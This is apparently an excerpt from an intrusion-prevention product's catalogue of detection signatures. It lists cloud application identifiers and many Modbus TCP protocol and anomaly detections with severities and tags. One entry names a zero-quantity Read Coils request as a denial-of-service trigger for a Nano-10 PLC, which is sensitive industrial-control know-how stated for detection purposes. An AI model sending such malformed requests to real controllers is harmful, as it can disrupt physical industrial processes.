About this situation: Application Mobile-Time-Sheets-App detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mobile Time Card solution that allows real-time tracking of Labor Costs, Budget vs. Actual, and Task Completion.
Back to top

MobileIron

About this situation: Application MobileIron detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MobileIron MDM and enterprise mobility services, offers its enterprise mobile solutions that meet both user demands and IT needs.
Back to top

Mobility-Portal

About this situation: Application Mobility-Portal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mobility Portal is the end-to-end solution with everything you need for workplace apps. Combine business data from on-premise and the cloud and bring it into a low-code HTML5 App Designer.
Back to top

MobilityCentral

About this situation: Application MobilityCentral detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wireless Mobility Company dedicated to administering the resources for a positive user experience of wireless communication systems.
Back to top

Mobiscope

About this situation: Application Mobiscope detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mobiscope is video surveillance service for home and small business and a white-label provider of this service to mobile carriers, camera manufacturers and other companies willing to offer surveillance service for their customers.
Back to top

Mobiso

About this situation: Application Mobiso detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mobiso is a Software-as-a-Service (SaaS), a combination of handheld software and cloud-based services that combine to deliver two key capabilities to enterprise wireless users.
Back to top

MockFlow

About this situation: Application MockFlow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MockFlow is an online wireframe software that helps to design, collaborate user interface mockups for software and websites.
Back to top

Mockingbird

About this situation: Application Mockingbird detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mockingbird is a tool that lets you quickly and easily create, link together, and collaborate on wireframes of your website or web application.
Back to top

Mockupbuilder

About this situation: Application Mockupbuilder detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mockup Builder is a startup of the FreezePro Software company. Mockup Builder provide software design and development. FreezePro Software is a custom software development and outsourcing company providing software development, technical support, UI
Back to top

Modbus_Diagnostics-Error-Response

About this situation: A Modbus Diagnostics error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Diagnostics-Request

About this situation: A Modbus Diagnostics request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Diagnostics-Response

About this situation: A Modbus Diagnostics response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Encapsulated-Interface-Transport-Error-Response

About this situation: Modbus Encapsulated Interface Transport error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-635-5211
Description:
Back to top

Modbus_Encapsulated-Interface-Transport-Request

About this situation: Modbus Encapsulated Interface Transport request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-635-5211
Description:
Back to top

Modbus_Encapsulated-Interface-Transport-Response

About this situation: Modbus Encapsulated Interface Transport (successful) response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-635-5211
Last changed: sgpkg-ips-635-5211
Description:
Back to top

Modbus_Error-Response-Reserved-Function-Code

About this situation: A reserved function code in Modbus error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-635-5211
Description:
Back to top

Modbus_Error-Response-Unassigned-Public-Function-Code

About this situation: An unassigned public function code in Modbus error response detected
Context: Modbus TCP Server PDU Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-635-5211
Description:
Back to top

Modbus_Error-Response-User-Defined-Function-Code

About this situation: A user-defined function code in Modbus error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Error-Response-Zero-Function-Code

About this situation: Function code 0 (zero) in Modbus error response detected
Context: Modbus TCP Server PDU Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Description:
Back to top

Modbus_Get-Comm-Event-Counter-Error-Response

About this situation: A Modbus Get Comm Event Counter error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Get-Comm-Event-Counter-Request

About this situation: A Modbus Get Comm Event Counter request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Get-Comm-Event-Counter-Response

About this situation: A Modbus Get Comm Event Counter response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Get-Comm-Event-Log-Error-Response

About this situation: A Modbus Get Comm Event Log error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Get-Comm-Event-Log-Request

About this situation: A Modbus Get Comm Event Log request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Get-Comm-Event-Log-Response

About this situation: A Modbus Get Comm Event Log response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Mask-Write-Register-Error-Response

About this situation: A Modbus Mask Write Register error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Mask-Write-Register-Request

About this situation: A Modbus Mask Write Register request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Mask-Write-Register-Response

About this situation: A Modbus Mask Write Register response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Coils-Error-Response

About this situation: A Modbus Read Coils Error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Coils-Quantity-Of-Coils-Zero

About this situation: A Modbus Read Coils Request with Quantity of coils set to zero detected
Context: Modbus TCP Client PDU Stream
Severity: 7
Tags: Nano-10, Any Hardware, Nano-10 PLC, CVE2013, Suspected Denial of Service, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-679-5211
Last changed: sgpkg-ips-679-5211
Vulnerability: Tri-PLC-Crafted-Packet-Denial-Of-Service
Description:
Back to top

Modbus_Read-Coils-Request

About this situation: A Modbus Read Coils Request PDU detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Coils-Response

About this situation: A Modbus Read Coils Response PDU detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Device-Identification-Error-Response

About this situation: Modbus Read Device Identification error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Device-Identification-Request

About this situation: Modbus Read Device Identification request detected
Context: Modbus TCP Client PDU Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Device-Identification-Response

About this situation: Modbus Read Device Identification (successful) response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Discrete-Inputs-Error-Response

About this situation: A Modbus Read Discrete Inputs error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Discrete-Inputs-Request

About this situation: A Modbus Read Discrete Inputs request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Discrete-Inputs-Response

About this situation: A Modbus Read Discrete Inputs response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Exception-Status-Error-Response

About this situation: A Modbus Read Exception Status error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Exception-Status-Request

About this situation: A Modbus Read Exception Status request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Exception-Status-Response

About this situation: A Modbus Read Exception Status response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-FIFO-Queue-Error-Response

About this situation: A Modbus Read FIFO Queue error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-FIFO-Queue-Request

About this situation: A Modbus Read FIFO Queue request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-FIFO-Queue-Response

About this situation: A Modbus Read FIFO Queue response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-File-Record-Error-Response

About this situation: A Modbus Read File Record error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-File-Record-Request

About this situation: A Modbus Read File Record request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-File-Record-Response

About this situation: A Modbus Read File Record response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Holding-Registers-Error-Response

About this situation: A Modbus Read Holding Registers error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Holding-Registers-Request

About this situation: A Modbus Read Holding Registers request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Holding-Registers-Response

About this situation: A Modbus Read Holding Registers response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Input-Registers-Error-Response

About this situation: A Modbus Read Input Registers error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Input-Registers-Request

About this situation: A Modbus Read Input Registers request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read-Input-Registers-Response

About this situation: A Modbus Read Input Registers response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read/Write-Multiple-Registers-Error-Response

About this situation: A Modbus Read/Write Multiple Reqisters error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read/Write-Multiple-Registers-Request

About this situation: A Modbus Read/Write Multiple Reqisters request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Read/Write-Multiple-Registers-Response

About this situation: A Modbus Read/Write Multiple Reqisters response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Report-Slave-Id-Error-Response

About this situation: A Modbus Report Slave ID error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Report-Slave-Id-Request

About this situation: A Modbus Report Slave ID request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Report-Slave-Id-Response

About this situation: A Modbus Report Slave ID response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Request-Clear-Counters-And-Diagnostics-Register

About this situation: Modbus Clear Counters and Diagnostic Register request detected
Context: Modbus TCP Client PDU Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Request-Force-Listen-Only-Mode

About this situation: A Modbus Force Listen Only Mode request detected
Context: Modbus TCP Client PDU Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Request-Reserved-Function-Code

About this situation: A reserved function code in Modbus request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-635-5211
Description:
Back to top

Modbus_Request-Restart-Communications-Option

About this situation: Modbus Restart Communucations Option request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Request-Unassigned-Public-Function-Code

About this situation: An unassigned public function code in Modbus request detected
Context: Modbus TCP Client PDU Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-635-5211
Description:
Back to top

Modbus_Request-User-Defined-Function-Code

About this situation: A user-defined function code in Modbus request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Request-Zero-Function-Code

About this situation: Function code 0 (zero) in Modbus request detected
Context: Modbus TCP Client PDU Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Description:
Back to top

Modbus_Response-Reserved-Function-Code

About this situation: A reserved function code in Modbus response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-635-5211
Description:
Back to top

Modbus_Response-Unassigned-Public-Function-Code

About this situation: An unassigned public function code in Modbus response detected
Context: Modbus TCP Server PDU Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-635-5211
Description:
Back to top

Modbus_Response-User-Defined-Function-Code

About this situation: A user-defined function code in Modbus response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Response-Zero-Function-Code

About this situation: Function code 0 (zero) in Modbus response detected
Context: Modbus TCP Server PDU Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Description:
Back to top

Modbus_TCP-Conflicting-Transaction

About this situation: Modbus TCP conflicting transaction
Context: Modbus TCP without parameters
Severity: 5
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-635-5211
Description: Modbus TCP request had same transaction ID as another in-flight Modbus TCP transaction.
Back to top

Modbus_TCP-Excess-Transactions

About this situation: Modbus TCP excess transactions
Context: Modbus TCP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-1531-5242
Description: Too many (over 16) Modbus TCP in-flight requests were seen. Allowing excess transactions can lower protocol inspection coverage and may cause false positives.
Back to top

Modbus_TCP-Foreign-Protocol

About this situation: Modbus TCP foreign protocol ID
Context: Modbus TCP without parameters
Severity: 5
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-635-5211
Description: Modbus TCP message had a foreign protocol ID. Modbus TCP protocol ID indicated payload of a message not to be Modbus. Allowing such messages may reduce effectiveness of protocol inspection.
Back to top

Modbus_TCP-Length-Violation

About this situation: Modbus TCP message length violation
Context: Modbus TCP without parameters
Severity: 5
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-635-5211
Description: The length of Modbus TCP message was either inconsistent or invalid. Modbus TCP message length either exceeded maximum allowed length, or MBAP length was inconsistent with length computed from PDU fields.
Back to top

Modbus_TCP-Mismatching-Response

About this situation: Modbus TCP mismatching response
Context: Modbus TCP without parameters
Severity: 5
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-635-5211
Description: Modbus TCP transaction response whose (sub)function code did not match function code in corresponding request was seen.
Back to top

Modbus_TCP-Missing-Request

About this situation: Modbus TCP missing request
Context: Modbus TCP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-1531-5242
Description: Modbus TCP response had a transaction ID without a corresponding in-flight request.
Back to top

Modbus_Write-File-Record-Error-Response

About this situation: A Modbus Write File Record error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-File-Record-Request

About this situation: A Modbus Write File Record request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-File-Record-Response

About this situation: A Modbus Write File Record response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Multiple-Coils-Error-Response

About this situation: A Modbus Write Multiple Coils error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Multiple-Coils-Request

About this situation: A Modbus Write Multiple Coils request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Multiple-Coils-Response

About this situation: A Modbus Write Multiple Coils response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Multiple-Registers-Error-Response

About this situation: A Modbus Write Multiple Registers error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Multiple-Registers-Request

About this situation: A Modbus Write Multiple Registers request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Multiple-Registers-Response

About this situation: A Modbus Write Multiple Registers response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Single-Coil-Error-Response

About this situation: A Modbus Write Single Coil error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Single-Coil-Request

About this situation: A Modbus Write Single Coil request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Single-Coil-Response

About this situation: A Modbus Write Single Coil response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Single-Register-Error-Response

About this situation: A Modbus Write Single Register error response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Single-Register-Request

About this situation: A Modbus Write Single Register request detected
Context: Modbus TCP Client PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modbus_Write-Single-Register-Response

About this situation: A Modbus Write Single Register response detected
Context: Modbus TCP Server PDU Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-634-5211
Description:
Back to top

Modeln

About this situation: Application Modeln detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Model N is the provide Revenue Management Cloud solutions. Model N helps its customers maximize their revenues by maximizing sell time, revenues per opportunity and number of opportunities. Model N Cloud solutions manage every dollar that impacts the customer's top line and transforms the revenue lifecycle from a series of disjointed operations into a strategic end-to-end process.
Back to top

ModernSystems

About this situation: Application ModernSystems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ModernSystems solves enterprise problems to legacy technology and mainframe modernization.
Back to top

MoinMoin

About this situation: MoinMoin usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: MoinMoin is a free wiki engine implemented in Python. The application uses a browser based technology and relies on HTTP for communications.
Back to top

MOIP

About this situation: Application MOIP detected
Context: Application Context
Severity: 1
